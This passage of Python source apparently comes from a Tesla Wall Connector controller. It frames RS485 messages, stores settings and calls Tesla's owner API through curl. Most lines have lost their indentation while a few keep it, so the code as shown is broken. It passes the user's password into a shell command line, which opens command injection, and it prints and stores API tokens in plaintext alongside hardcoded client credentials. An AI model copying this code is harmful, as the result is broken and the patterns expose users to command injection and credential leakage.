return(datetime.now().strftime("%H:%M:%S" + (
".%f" if displayMilliseconds else "")))
def hex_str(s):
    # Accept either a str or a bytes-like object and return space-separated hex bytes.
    # (The original defined two hex_str functions; the second silently shadowed the first.)
    if isinstance(s, str):
        return " ".join("{:02X}".format(ord(c)) for c in s)
    return " ".join("{:02X}".format(c) for c in s)
def run_process(cmd):
result = None
try:
result = subprocess.check_output(cmd, shell=True)
except subprocess.CalledProcessError:
# We reach this point if the process returns a non-zero exit code.
result = b''
return result
def load_settings():
global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
scheduledAmpsStartHour, scheduledAmpsEndHour, \
scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
homeLat, homeLon
try:
fh = open(settingsFileName, 'r')
for line in fh:
m = re.search(r'^\s*nonScheduledAmpsMax\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
nonScheduledAmpsMax = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: nonScheduledAmpsMax set to " + str(nonScheduledAmpsMax))
continue
m = re.search(r'^\s*scheduledAmpsMax\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsMax set to " + str(scheduledAmpsMax))
continue
m = re.search(r'^\s*scheduledAmpsStartHour\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsStartHour = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsStartHour set to " + str(scheduledAmpsStartHour))
continue
m = re.search(r'^\s*scheduledAmpsEndHour\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsEndHour = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsEndHour set to " + str(scheduledAmpsEndHour))
continue
m = re.search(r'^\s*scheduledAmpsDaysBitmap\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
scheduledAmpsDaysBitmap = int(m.group(1))
if(debugLevel >= 10):
print("load_settings: scheduledAmpsDaysBitmap set to " + str(scheduledAmpsDaysBitmap))
continue
m = re.search(r'^\s*hourResumeTrackGreenEnergy\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: hourResumeTrackGreenEnergy set to " + str(hourResumeTrackGreenEnergy))
continue
m = re.search(r'^\s*kWhDelivered\s*=\s*([-0-9.]+)', line, re.MULTILINE)
if(m):
kWhDelivered = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: kWhDelivered set to " + str(kWhDelivered))
continue
m = re.search(r'^\s*carApiBearerToken\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiBearerToken = m.group(1)
if(debugLevel >= 10):
print("load_settings: carApiBearerToken set to " + str(carApiBearerToken))
continue
m = re.search(r'^\s*carApiRefreshToken\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiRefreshToken = m.group(1)
if(debugLevel >= 10):
print("load_settings: carApiRefreshToken set to " + str(carApiRefreshToken))
continue
m = re.search(r'^\s*carApiTokenExpireTime\s*=\s*(.+)', line, re.MULTILINE)
if(m):
carApiTokenExpireTime = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: carApiTokenExpireTime set to " + str(carApiTokenExpireTime))
continue
m = re.search(r'^\s*homeLat\s*=\s*(.+)', line, re.MULTILINE)
if(m):
homeLat = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: homeLat set to " + str(homeLat))
continue
m = re.search(r'^\s*homeLon\s*=\s*(.+)', line, re.MULTILINE)
if(m):
homeLon = float(m.group(1))
if(debugLevel >= 10):
print("load_settings: homeLon set to " + str(homeLon))
continue
print(time_now() + ": load_settings: Unknown setting " + line)
fh.close()
except FileNotFoundError:
pass
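# Example settings-file contents (hypothetical values, for illustration only):
# this is the simple 'key=value' format that load_settings() parses line by line
# and save_settings() writes back out.
_EXAMPLE_SETTINGS_FILE = (
    "nonScheduledAmpsMax=12\n"
    "scheduledAmpsMax=16\n"
    "scheduledAmpsStartHour=23.5\n"
    "scheduledAmpsEndHour=6.0\n"
    "scheduledAmpsDaysBitmap=127\n"
    "hourResumeTrackGreenEnergy=9.0\n"
    "kWhDelivered=119\n"
)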
def save_settings():
global debugLevel, settingsFileName, nonScheduledAmpsMax, scheduledAmpsMax, \
scheduledAmpsStartHour, scheduledAmpsEndHour, \
scheduledAmpsDaysBitmap, hourResumeTrackGreenEnergy, kWhDelivered, \
carApiBearerToken, carApiRefreshToken, carApiTokenExpireTime, \
homeLat, homeLon
fh = open(settingsFileName, 'w')
fh.write('nonScheduledAmpsMax=' + str(nonScheduledAmpsMax) +
'\nscheduledAmpsMax=' + str(scheduledAmpsMax) +
'\nscheduledAmpsStartHour=' + str(scheduledAmpsStartHour) +
'\nscheduledAmpsEndHour=' + str(scheduledAmpsEndHour) +
'\nscheduledAmpsDaysBitmap=' + str(scheduledAmpsDaysBitmap) +
'\nhourResumeTrackGreenEnergy=' + str(hourResumeTrackGreenEnergy) +
'\nkWhDelivered=' + str(kWhDelivered) +
'\ncarApiBearerToken=' + str(carApiBearerToken) +
'\ncarApiRefreshToken=' + str(carApiRefreshToken) +
'\ncarApiTokenExpireTime=' + str(int(carApiTokenExpireTime)) +
'\nhomeLat=' + str(homeLat) +
'\nhomeLon=' + str(homeLon)
)
fh.close()
def trim_pad(s:bytearray, makeLen):
# Trim or pad s with zeros so that it's makeLen length.
while(len(s) < makeLen):
s += b'\x00'
if(len(s) > makeLen):
s = s[0:makeLen]
return s
def send_msg(msg):
# Send msg on the RS485 network. We'll escape bytes with a special meaning,
# add a CRC byte to the message end, and add a C0 byte to the start and end
# to mark where it begins and ends.
global ser, timeLastTx, fakeMaster, slaveTWCRoundRobin
msg = bytearray(msg)
checksum = 0
for i in range(1, len(msg)):
checksum += msg[i]
msg.append(checksum & 0xFF)
# Escaping special chars:
# The protocol uses C0 to mark the start and end of the message. If a C0
# must appear within the message, it is 'escaped' by replacing it with
# DB and DC bytes.
# A DB byte in the message is escaped by replacing it with DB DD.
#
# User FuzzyLogic found that this method of escaping and marking the start
# and end of messages is based on the SLIP protocol discussed here:
# https://en.wikipedia.org/wiki/Serial_Line_Internet_Protocol
i = 0
while(i < len(msg)):
if(msg[i] == 0xc0):
msg[i:i+1] = b'\xdb\xdc'
i = i + 1
elif(msg[i] == 0xdb):
msg[i:i+1] = b'\xdb\xdd'
i = i + 1
i = i + 1
msg = bytearray(b'\xc0' + msg + b'\xc0')
if(debugLevel >= 9):
print("Tx@" + time_now() + ": " + hex_str(msg))
ser.write(msg)
timeLastTx = time.time()
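# Worked example of the framing above (bytes shortened for illustration; real
# messages are longer):
#   payload:        FD E0 C0 00
#   checksum:       (E0 + C0 + 00) & 0xFF = A0   (first byte is excluded)
#   with checksum:  FD E0 C0 00 A0
#   after escaping: FD E0 DB DC 00 A0            (C0 -> DB DC)
#   on the wire:    C0 FD E0 DB DC 00 A0 C0      (C0 framing added)
# unescape_msg() below reverses the escaping and strips the framing bytes.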
def unescape_msg(msg:bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
msg = msg[0:msgLen]
# See notes in send_msg() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
    while i < len(msg) - 1:
if(msg[i] == 0xdb):
if(msg[i+1] == 0xdc):
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i:i+2] = [0xc0]
elif(msg[i+1] == 0xdd):
msg[i:i+2] = [0xdb]
else:
print(time_now(), "ERROR: Special character 0xDB in message is " \
"followed by invalid character 0x%02X. " \
"Message may be corrupted." %
(msg[i+1]))
# Replace the character with something even though it's probably
# not the right thing.
msg[i:i+2] = [0xdb]
i = i+1
# Remove leading and trailing C0 byte.
msg = msg[1:len(msg)-1]
return msg
def send_master_linkready1():
if(debugLevel >= 1):
print(time_now() + ": Send master linkready1")
# When master is powered on or reset, it sends 5 to 7 copies of this
# linkready1 message followed by 5 copies of linkready2 (I've never seen
# more or less than 5 of linkready2).
#
# This linkready1 message advertises master's TWCID to other slaves on the
# network.
# If a slave happens to have the same id as master, it will pick a new
# random TWCID. Other than that, slaves don't seem to respond to linkready1.
# linkready1 and linkready2 are identical except FC E1 is replaced by FB E2
# in bytes 2-3. Both messages will cause a slave to pick a new id if the
# slave's id conflicts with master.
# If a slave stops sending heartbeats for awhile, master may send a series
# of linkready1 and linkready2 messages in seemingly random order, which
# means they don't indicate any sort of startup state.
# linkready1 is not sent again after boot/reset unless a slave sends its
# linkready message.
# At that point, linkready1 message may start sending every 1-5 seconds, or
# it may not be sent at all.
# Behaviors I've seen:
# Not sent at all as long as slave keeps responding to heartbeat messages
# right from the start.
# If slave stops responding, then re-appears, linkready1 gets sent
# frequently.
# One other possible purpose of linkready1 and/or linkready2 is to trigger
# an error condition if two TWCs on the network transmit those messages.
# That means two TWCs have rotary switches setting them to master mode and
# they will both flash their red LED 4 times with top green light on if that
# happens.
# Also note that linkready1 starts with FC E1 which is similar to the FC D1
# message that masters send out every 4 hours when idle. Oddly, the FC D1
# message contains all zeros instead of the master's id, so it seems
# pointless.
# I also don't understand the purpose of having both linkready1 and
# linkready2 since only two or more linkready2 will provoke a response from
# a slave regardless of whether linkready1 was sent previously. Firmware
# trace shows that slaves do something somewhat complex when they receive
# linkready1 but I haven't been curious enough to try to understand what
    # they're doing. Tests show neither linkready1 nor linkready2 is necessary. Slaves
# send slave linkready every 10 seconds whether or not they got master
# linkready1/2 and if a master sees slave linkready, it will start sending
# the slave master heartbeat once per second and the two are then connected.
send_msg(bytearray(b'\xFC\xE1') + fakeTWCID + masterSign + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def send_master_linkready2():
if(debugLevel >= 1):
print(time_now() + ": Send master linkready2")
# This linkready2 message is also sent 5 times when master is booted/reset
# and then not sent again if no other TWCs are heard from on the network.
# If the master has ever seen a slave on the network, linkready2 is sent at
# long intervals.
# Slaves always ignore the first linkready2, but respond to the second
# linkready2 around 0.2s later by sending five slave linkready messages.
#
# It may be that this linkready2 message that sends FB E2 and the master
# heartbeat that sends fb e0 message are really the same, (same FB byte
# which I think is message type) except the E0 version includes the TWC ID
# of the slave the message is intended for whereas the E2 version has no
# recipient TWC ID.
#
# Once a master starts sending heartbeat messages to a slave, it
# no longer sends the global linkready2 message (or if it does,
# they're quite rare so I haven't seen them).
send_msg(bytearray(b'\xFB\xE2') + fakeTWCID + masterSign + bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00'))
def send_slave_linkready():
# In the message below, \x1F\x40 (hex 0x1f40 or 8000 in base 10) refers to
# this being a max 80.00Amp charger model.
# EU chargers are 32A and send 0x0c80 (3200 in base 10).
#
# I accidentally changed \x1f\x40 to \x2e\x69 at one point, which makes the
# master TWC immediately start blinking its red LED 6 times with top green
# LED on. Manual says this means "The networked Wall Connectors have
# different maximum current capabilities".
msg = bytearray(b'\xFD\xE2') + fakeTWCID + slaveSign + bytearray(b'\x1F\x40\x00\x00\x00\x00\x00\x00')
    # Note: this is a module-level function, not a TWCSlave method, so there
    # is no 'self' here. We assume a module-level protocolVersion setting
    # tracks which protocol our fake slave speaks.
    if(protocolVersion == 2):
        msg += bytearray(b'\x00\x00')
send_msg(msg)
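# For illustration, the un-escaped slave linkready payload assembled above is:
#   FD E2 <fakeTWCID bytes> <slaveSign byte(s)> 1F 40 00 00 00 00 00 00 [00 00]
# where 1F 40 (8000) advertises an 80.00A model and the trailing 00 00 is only
# added when speaking protocol 2. send_msg() then appends the checksum and the
# C0 framing.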
def master_id_conflict():
# We're playing fake slave, and we got a message from a master with our TWCID.
# By convention, as a slave we must change our TWCID because a master will not.
fakeTWCID[0] = random.randint(0, 0xFF)
fakeTWCID[1] = random.randint(0, 0xFF)
# Real slaves change their sign during a conflict, so we do too.
slaveSign[0] = random.randint(0, 0xFF)
print(time_now() + ": Master's TWCID matches our fake slave's TWCID. " \
"Picked new random TWCID %02X%02X with sign %02X" % \
(fakeTWCID[0], fakeTWCID[1], slaveSign[0]))
def new_slave(newSlaveID, maxAmps):
global slaveTWCs, slaveTWCRoundRobin
try:
slaveTWC = slaveTWCs[newSlaveID]
# We didn't get KeyError exception, so this slave is already in
# slaveTWCs and we can simply return it.
return slaveTWC
except KeyError:
pass
slaveTWC = TWCSlave(newSlaveID, maxAmps)
slaveTWCs[newSlaveID] = slaveTWC
slaveTWCRoundRobin.append(slaveTWC)
if(len(slaveTWCRoundRobin) > 3):
print("WARNING: More than 3 slave TWCs seen on network. " \
"Dropping oldest: " + hex_str(slaveTWCRoundRobin[0].TWCID) + ".")
delete_slave(slaveTWCRoundRobin[0].TWCID)
return slaveTWC
def delete_slave(deleteSlaveID):
global slaveTWCs, slaveTWCRoundRobin
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].TWCID == deleteSlaveID):
del slaveTWCRoundRobin[i]
break
try:
del slaveTWCs[deleteSlaveID]
except KeyError:
pass
def total_amps_actual_all_twcs():
global debugLevel, slaveTWCRoundRobin, wiringMaxAmpsAllTWCs
totalAmps = 0
for slaveTWC in slaveTWCRoundRobin:
totalAmps += slaveTWC.reportedAmpsActual
if(debugLevel >= 10):
print("Total amps all slaves are using: " + str(totalAmps))
return totalAmps
def car_api_available(email = None, password = None, charge = None):
global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
carApiTransientErrors, carApiBearerToken, carApiRefreshToken, \
carApiTokenExpireTime, carApiVehicles
now = time.time()
apiResponseDict = {}
if(now - carApiLastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error. To keep strain off Tesla's API servers, wait
# carApiErrorRetryMins mins till we try again. This delay could be
# reduced if you feel the need. It's mostly here to deal with unexpected
# errors that are hopefully transient.
# https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052
# says he tested hammering the servers with requests as fast as possible
# and was automatically blacklisted after 2 minutes. Waiting 30 mins was
# enough to clear the blacklist. So at this point it seems Tesla has
# accepted that third party apps use the API and deals with bad behavior
# automatically.
if(debugLevel >= 11):
print(time_now() + ': Car API disabled for ' +
str(int(carApiErrorRetryMins*60 - (now - carApiLastErrorTime))) +
' more seconds due to recent error.')
return False
# Tesla car API info comes from https://timdorr.docs.apiary.io/
if(carApiBearerToken == '' or carApiTokenExpireTime - now < 30*24*60*60):
cmd = None
apiResponse = b''
# If we don't have a bearer token or our refresh token will expire in
# under 30 days, get a new bearer token. Refresh tokens expire in 45
# days when first issued, so we'll get a new token every 15 days.
if(carApiRefreshToken != ''):
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
json.dumps({'grant_type': 'refresh_token', \
'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
'refresh_token': carApiRefreshToken }) + \
'\' "https://owner-api.teslamotors.com/oauth/token"'
elif(email != None and password != None):
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
json.dumps({'grant_type': 'password', \
'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
'email': email, 'password': password }) + \
'\' "https://owner-api.teslamotors.com/oauth/token"'
if(cmd != None):
if(debugLevel >= 2):
# Hide car password in output
cmdRedacted = re.sub(r'("password": )"[^"]+"', r'\1[HIDDEN]', cmd)
print(time_now() + ': Car API cmd', cmdRedacted)
apiResponse = run_process(cmd)
# Example response:
# b'{"access_token":"4720d5f980c9969b0ca77ab39399b9103adb63ee832014fe299684201929380","token_type":"bearer","expires_in":3888000,"refresh_token":"110dd4455437ed351649391a3425b411755a213aa815171a2c6bfea8cc1253ae","created_at":1525232970}'
try:
apiResponseDict = json.loads(apiResponse.decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API auth response', apiResponseDict, '\n')
carApiBearerToken = apiResponseDict['access_token']
carApiRefreshToken = apiResponseDict['refresh_token']
carApiTokenExpireTime = now + apiResponseDict['expires_in']
except KeyError:
print(time_now() + ": ERROR: Can't access Tesla car via API. Please log in again via web interface.")
carApiLastErrorTime = now
# Instead of just setting carApiLastErrorTime, erase tokens to
# prevent further authorization attempts until user enters password
# on web interface. I feel this is safer than trying to log in every
# ten minutes with a bad token because Tesla might decide to block
# remote access to your car after too many authorization errors.
carApiBearerToken = ''
carApiRefreshToken = ''
save_settings()
if(carApiBearerToken != ''):
if(len(carApiVehicles) < 1):
cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles"'
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API vehicle list', apiResponseDict, '\n')
for i in range(0, apiResponseDict['count']):
carApiVehicles.append(CarApiVehicle(apiResponseDict['response'][i]['id']))
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
print(time_now() + ": ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(carApiErrorRetryMins) + " minutes.")
carApiLastErrorTime = now
return False
if(len(carApiVehicles) > 0):
# Wake cars if needed
needSleep = False
for vehicle in carApiVehicles:
if(charge == True and vehicle.stopAskingToStartCharging):
if(debugLevel >= 8):
print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
+ " because vehicle.stopAskingToStartCharging == True")
continue
if(now - vehicle.lastErrorTime < carApiErrorRetryMins*60):
# It's been under carApiErrorRetryMins minutes since the car
# API generated an error on this vehicle. Don't send it more
# commands yet.
if(debugLevel >= 8):
print(time_now() + ": Don't send commands to vehicle " + str(vehicle.ID)
+ " because it returned an error in the last "
+ str(carApiErrorRetryMins) + " minutes.")
continue
if(vehicle.ready()):
continue
if(now - vehicle.lastWakeAttemptTime <= vehicle.delayNextWakeAttempt):
if(debugLevel >= 10):
print(time_now() + ": car_api_available returning False because we are still delaying "
                    + str(vehicle.delayNextWakeAttempt) + " seconds after the last failed wake attempt.")
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
vehicle.lastWakeAttemptTime = now
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(vehicle.ID) + '/wake_up"'
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
state = 'error'
try:
if(debugLevel >= 4):
print(time_now() + ': Car API wake car response', apiResponseDict, '\n')
state = apiResponseDict['response']['state']
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = 'error'
if(state == 'online'):
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastWakeAttemptTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if(vehicle.firstWakeAttemptTime == 0):
vehicle.firstWakeAttemptTime = now
if(state == 'asleep' or state == 'waking'):
if(now - vehicle.firstWakeAttemptTime <= 10*60):
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30;
elif(now - vehicle.firstWakeAttemptTime <= 70*60):
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5*60;
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15*60;
elif(state == 'offline'):
if(now - vehicle.firstWakeAttemptTime <= 31*60):
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25;
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
if(now - vehicle.firstWakeAttemptTime <= 60*60):
# We've tried to wake the car for less than an
# hour.
foundKnownError = False
if('error' in apiResponseDict):
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
foundKnownError = True
break
if(foundKnownError):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting 5 minutes for retry in the standard
# error handler.
vehicle.delayNextWakeAttempt = 60;
else:
# We're in an unexpected state. This could be caused
# by the API servers being down, car being out of
# range, or by something I can't anticipate. Try
# waking the car every 5 mins.
vehicle.delayNextWakeAttempt = 5*60;
else:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15*60;
if(debugLevel >= 1):
if(state == 'error'):
print(time_now() + ": Car API wake car failed with unknown response. " \
"Will try again in "
+ str(vehicle.delayNextWakeAttempt) + " seconds.")
else:
print(time_now() + ": Car API wake car failed. State remains: '"
+ state + "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt) + " seconds.")
if(vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60*60):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
print(time_now() + ": ERROR: We have failed to wake a car from '"
+ state + "' state for %.1f hours.\n" \
"Please private message user CDragon at " \
"http://teslamotorsclub.com with a copy of this error. " \
"Also include this: %s" % (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict)))
if(now - carApiLastErrorTime < carApiErrorRetryMins*60 or carApiBearerToken == ''):
if(debugLevel >= 8):
print(time_now() + ": car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - carApiLastErrorTime) + " or empty carApiBearerToken '"
+ carApiBearerToken + "'")
return False
if(debugLevel >= 8):
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
print(time_now() + ": car_api_available returning True")
if(needSleep):
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5);
return True
def car_api_charge(charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
carApiTransientErrors, carApiVehicles, carApiLastStartOrStopChargeTime, \
homeLat, homeLon, onlyChargeMultiCarsAtHome
now = time.time()
apiResponseDict = {}
if(not charge):
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in carApiVehicles:
vehicle.stopAskingToStartCharging = False
if(now - carApiLastStartOrStopChargeTime < 60):
# Don't start or stop more often than once a minute
if(debugLevel >= 8):
print(time_now() + ': car_api_charge return because under 60 sec since last carApiLastStartOrStopChargeTime')
return 'error'
if(car_api_available(charge = charge) == False):
if(debugLevel >= 8):
print(time_now() + ': car_api_charge return because car_api_available() == False')
return 'error'
startOrStop = 'start' if charge else 'stop'
result = 'success'
for vehicle in carApiVehicles:
if(charge and vehicle.stopAskingToStartCharging):
if(debugLevel >= 8):
print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
+ " because vehicle.stopAskingToStartCharging == True")
continue
if(vehicle.ready() == False):
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
carApiLastStartOrStopChargeTime = now
if(onlyChargeMultiCarsAtHome and len(carApiVehicles) > 1):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if(vehicle.update_location() == False):
result = 'error'
continue
if(homeLat == 10000):
if(debugLevel >= 1):
print(time_now() + ": Home location for vehicles has never been set. " +
"We'll assume home is where we found the first vehicle currently parked. " +
"Home set to lat=" + str(vehicle.lat) + ", lon=" +
str(vehicle.lon))
homeLat = vehicle.lat
homeLon = vehicle.lon
save_settings()
# 1 lat or lon = ~364488.888 feet. The exact feet is different depending
# on the value of latitude, but this value should be close enough for
# our rough needs.
# 1/364488.888 * 10560 = 0.0289.
            # So if the vehicle is within 0.0289 degrees of lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
if(abs(homeLat - vehicle.lat) > 0.0289
or abs(homeLon - vehicle.lon) > 0.0289):
# Vehicle is not at home, so don't change its charge state.
if(debugLevel >= 1):
print(time_now() + ': Vehicle ID ' + str(vehicle.ID) +
' is not at home. Do not ' + startOrStop + ' charge.')
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
carApiBearerToken + \
'" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
str(vehicle.ID) + '/command/charge_' + startOrStop + '"'
# Retry up to 3 times on certain errors.
for retryCount in range(0, 3):
if(debugLevel >= 8):
print(time_now() + ': Car API cmd', cmd)
try:
apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
except json.decoder.JSONDecodeError:
pass
try:
if(debugLevel >= 4):
print(time_now() + ': Car API ' + startOrStop + \
' charge response', apiResponseDict, '\n')
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if(apiResponseDict['response'] == None):
if('error' in apiResponseDict):
foundKnownError = False
error = apiResponseDict['error']
for knownError in carApiTransientErrors:
if(knownError == error[0:len(knownError)]):
# I see these errors often enough that I think
# it's worth re-trying in 1 minute rather than
# waiting carApiErrorRetryMins minutes for retry
# in the standard error handler.
if(debugLevel >= 1):
print(time_now() + ": Car API returned '"
+ error
+ "' when trying to start charging. Try again in 1 minute.")
